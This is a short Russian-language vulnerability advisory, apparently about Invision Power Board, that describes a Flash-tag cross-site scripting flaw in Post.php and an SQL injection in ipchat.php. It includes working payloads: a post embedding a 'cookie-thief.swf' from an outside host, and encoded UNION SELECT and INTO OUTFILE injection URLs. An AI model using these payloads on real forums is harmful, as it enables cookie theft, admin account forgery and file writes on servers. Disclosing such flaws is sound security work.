|
|
 |
|
|
|
|
|
|
Применение Exploit: Локально: – Удаленно: ДА
Детали уязвимости:
ОБЪЕКТ: Post.php
ОПИСАНИЕ: При использование тегов [FLASH=h,w][/FLASH], внутри их тела (Post-textarea), возможно выполнение произвольных скриптов клиента, что приведет к воровству cookies. По умолчанию, использование FLASH тегов разрешено в настройках «conf_global.php»:
$INFO['allow_flash'] = '1';
ПРИМЕР:
hey dude, whats up? [FLASH=2,2]http:// anotherhost.ext/cookie-thief.swf[/FLASH] cu, jonnie
ОБЪЕКТ: ipchat.php
ОПИСАНИЕ: В зависимости от mysql версии и/или драйверов возможно выполнение произвольных запросов.
ПРИМЕР (mySql > 4):
http:// localhost/ibo/ipchat.php? password=1& username=9x%2527+union+select+ %25271%2527, %2527c4ca4238a0b923820dcc509a6f75849b %2527, %2527admin%2527, 1%252f*+
ПРИМЕР (с правами доступа к файлам):
http:// localhost/ibo/ipchat.php?password=1 &username=admin%2527into+outfile+ %2527[fullpath]%2527--+
Работает на DokuWiki |